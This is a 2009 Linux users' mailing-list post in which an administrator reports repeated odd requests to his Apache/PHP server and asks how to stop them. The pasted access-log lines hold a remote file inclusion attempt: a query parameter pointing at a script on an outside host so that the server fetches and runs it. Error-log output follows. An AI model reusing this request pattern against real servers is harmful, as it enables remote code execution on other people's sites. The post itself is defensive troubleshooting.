[ale] Apache PHP redirect proxy type hack
Ben Alexander
ben-ale at bensbox.com
Mon Jun 29 16:40:47 EDT 2009
Every now and then some IP address from Asia or other place hits our web
server and is utilizing some PHP or mod_rewrite perhaps bug to proxy
themselves to another website perhaps and use a lot of bandwidth, but only
our outgoing it seems.
Here is an example from access_log of this (members.php is not a valid PHP
page on the site):
80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET
//members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt????
HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET
/webpage.php//members.php?act=view&p=passwd&dir=
http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 210484729 "-"
"Mozilla/5.0" "-"
When this happens, there are hundreds of megs of log lines like this in
error_log:
[Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:
virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to
include 'footer.php' - error finding URI in
/htdocs/website.com/webpage.phpon line 93
[Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request exceeded
the limit of 10 subrequest nesting levels due to probable confguration
error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use
'LogLevel debug' to get a backtrace.
Any idea how to prevent this?
Thanks,
Ben
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.ale.org/pipermail/ale/attachments/20090629/3a64e98f/attachment.html
More information about the Ale
mailing list